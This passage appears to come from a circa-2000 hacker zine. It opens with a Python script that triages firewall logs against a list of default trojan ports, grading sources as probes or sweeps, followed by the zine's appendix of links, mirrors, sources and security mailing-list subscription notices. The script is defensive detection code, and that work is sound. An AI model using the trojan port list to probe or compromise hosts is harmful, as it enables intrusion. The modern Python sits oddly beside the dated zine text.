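# Listed ports that are also the standard ports of FTP, Telnet, SMTP and HTTP.
# A hit on one of these is ordinary service traffic far more often than a trojan.
SERVICE_PORTS = {21, 23, 25, 80}

ENTRY = re.compile(r"^\s*port\s+(\d+)\s+-\s+(.*)$")

def parse_port_list(text):
    """Return {port: [names]}, folding wrapped lines back into their entry."""
    raw, current = {}, None
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            current = int(m.group(1))
            raw[current] = m.group(2).strip()
        elif line.strip() and current is not None:
            # Continuation line: a name can wrap mid-name ("Shtrilitz" / "Stealth").
            raw[current] += " " + line.strip()
    return {port: [n.strip() for n in names.split(",") if n.strip()]
            for port, names in raw.items()}

# Hypothetical log format for this example:
#   DATE TIME ACTION PROTO SRC:SPORT -> DST:DPORT
LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<action>ALLOW|DENY) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample lines; all addresses are documentation or private ranges.
SAMPLE_LOG = """\
2000-11-20 13:19:31 DENY UDP 192.0.2.10:1046 -> 10.0.0.5:31337
2000-11-20 13:19:32 DENY TCP 192.0.2.10:1047 -> 10.0.0.5:12345
2000-11-20 13:19:33 DENY TCP 192.0.2.10:1048 -> 10.0.0.6:20034
2000-11-20 13:20:02 ALLOW TCP 198.51.100.7:2211 -> 10.0.0.9:80
2000-11-20 13:21:40 ALLOW TCP 203.0.113.44:3390 -> 10.0.0.8:6969
2000-11-20 13:22:05 ALLOW TCP 198.51.100.7:2212 -> 10.0.0.9:443
garbage line that does not parse
"""

def triage(log_text, table):
    """Group hits on listed ports by source address and grade each source."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsed lines are skipped, not guessed at
        dport = int(m["dport"])
        if dport not in table:
            continue
        hits[m["src"]].append({
            "dst": m["dst"], "port": dport, "action": m["action"],
            "candidates": table[dport], "ambiguous": dport in SERVICE_PORTS,
        })
    report = {}
    for src, events in hits.items():
        strong = [e for e in events if not e["ambiguous"]]
        if any(e["action"] == "ALLOW" for e in strong):
            grade = "inspect-host"   # a connection reached a listed default port
        elif len({e["port"] for e in strong}) >= 2:
            grade = "sweep"          # one source trying several listed defaults
        elif strong:
            grade = "probe"
        else:
            grade = "likely-benign"  # only standard service ports matched
        report[src] = {"grade": grade, "events": events}
    # The ports are defaults only: a source missing from the report proves nothing.
    return report

if __name__ == "__main__":
    for src, info in triage(SAMPLE_LOG, parse_port_list(PORT_LIST)).items():
        ports = sorted({e["port"] for e in info["events"]})
        print(f"{src:15} {info['grade']:14} ports={ports}")
```
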


  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The links are no longer maintained in this file; there is now a
      links section at http://welcome.to/HWA.hax0r.news/, so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW ** CHANGED TO -> http://defaced.alldas.de
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others, please send in news site links that
      have security news from foreign countries for inclusion in this list,
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*
      (Dutch)         http://www.securax.org/ *New*
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net
      Canada........: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net
      Finland.......: http://hackunlimited.com/
      Germany.......: http://www.alldas.de/ -> http://defaced.alldas.de
                      http://www.security-news.com/
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/
      Netherlands...: http://security.pine.nl/
      Russia........: http://www.tsu.ru/~eugene/
      Singapore.....: http://www.icepoint.com
      South Africa..: http://www.hackers.co.za
                      http://www.hack.co.za ** DOWN AGAIN **
                      http://www.posthuman.za.net
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to cruciphux@dok.org and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    
A.2 Hot Hits
    ~~~~~~~~    

    Useless information for the curious:
    
    Country and domain hits to main news page main.php on hwa-security.net
    
    Only the top few countries are listed. This counter was activated 12 Aug 2000
    and little to no advertising has been done (as is obvious from our hits).
    It IS interesting to see that Europe is our biggest draw.
    
    * The site and zine author and core HWA crew are based in Canada.
    
    Pageviews per domain
     1.  Network             987  15.95 %      2.  US Commercial    818  13.21 %
    *3.  Canada              207   3.34 %      4.  US Educational   168   2.71 %
     5.  Netherlands         160   2.58 %      6.  Germany          139   2.25 %
     7.  Australia           103   1.66 %      8.  Brazil            82   1.32 %
     9.  Sweden               80   1.29 %     10.  United Kingdom    76   1.23 %
    11.  Croatia (Hrvatska)   72   1.16 %     12.  Norway            67   1.08 %
    13.  Malaysia             53   0.86 %     14.  France            53   0.86 %
    15.  Nicaragua            39   0.63 %     16.  Hungary           38   0.61 %
    17.  Russian Federation   37   0.6 %      18.  Taiwan            37   0.6 %
    19.  Israel               36   0.58 %     20.  Korea (South)     35   0.57 %
    21.  Poland               35   0.57 %     22.  Unknown         2247  36.3 %

    Plus 70+ other countries showed trickledowns also.

   
    Pageviews per region
    1.  North-America     1247  20.15 %
    2.  Europe            1073  17.33 %
    3.  None (.net, .org) 1019  16.46 %
    4.  Asia               275  4.44 %
    5.  Australia          125  2.02 %
    6.  South America      117  1.89 %
    7.  Central America     67  1.08 %
    8.  Africa              20  0.32 %
    -   Unknown           2247  36.3 %
    
    Note the coverage, an interesting spread. Several hits come from sites
    like .gov that were defaced by SKRU and GForce Pakistan, who provided links
    to our page on their defacements. Jury is out as to whether this is a good
    or bad thing. I'll take it as a good thing for now. :p
    
    @HWA    
    
    
    

A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/
                      
                      
                      
   Some of these are not keeping up with new issues like they should be. You
   can always get the latest issue from www.csoft.net/~hwa or join us on IRC
   (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
   where the latest issues may be obtained. I also upload all issues to
   etext.org; the zines are available thru their ftp service, updates are slow.
   - Ed

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews     
        http://www.attrition.org/hosted/hwa/
        http://hwazine.cjb.net/   
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/                                
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites of no use to anyone. too lazy to kill em.      
     
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/     
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** and -> http://defaced.alldas.de
     http://www.csoft.net/~hwa/           
     http://welcome.to/HWA.hax0r.news/ 
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm
     
     
     @HWA
     
     
  
A.4  The hacker's Ethic (90's Style)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     
          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer.
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.
     
     @HWA
     
A.5  Sources *** (VERY incomplete)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


    Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance). Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information are compiled
    and/or sourced by Cruciphux, no copyright claimed.


    News site.........................http://www.ukhackers.com/  *NEW*
    News site.........................http://www.hackernews.com.br/ *NEW* 
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
   *News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(l0phtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    General Security/Exploits.........http://packetstorm.securify.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ 
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    News/Technology ..................http://www.technologyevaluation.com/ 
    
    * HNN also archives back issues of their news; use the following URL format:
    
      http://www.hackernews.com/arch.html?012700
    
      where 01 = month (Jan), 27 = day, 00 = year. They are archived here also as
      part of the compilation and broad archival concept we are trying to maintain
      with this publication. - Ed
    
    

    + Various mailing lists and some newsgroups, such as ...
    + other sites available on the HNN affiliates page, please see
      http://www.hackernews.com/affiliates.html as they seem to be popping up
      rather frequently ... see http://hwa-security.net links section for more.

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>
    
    @HWA
    
    
    
A.6  Resources
     ~~~~~~~~~     
     
     Pulled for reworking.
     
     EoF
    

A.7  Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide. If no response is received within a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and it may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed
    
    
    

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~



    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list's charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security 
      organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector 
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without 
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits,
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         from our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

    ISSN 1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader: Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles. If I had my
    way I'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
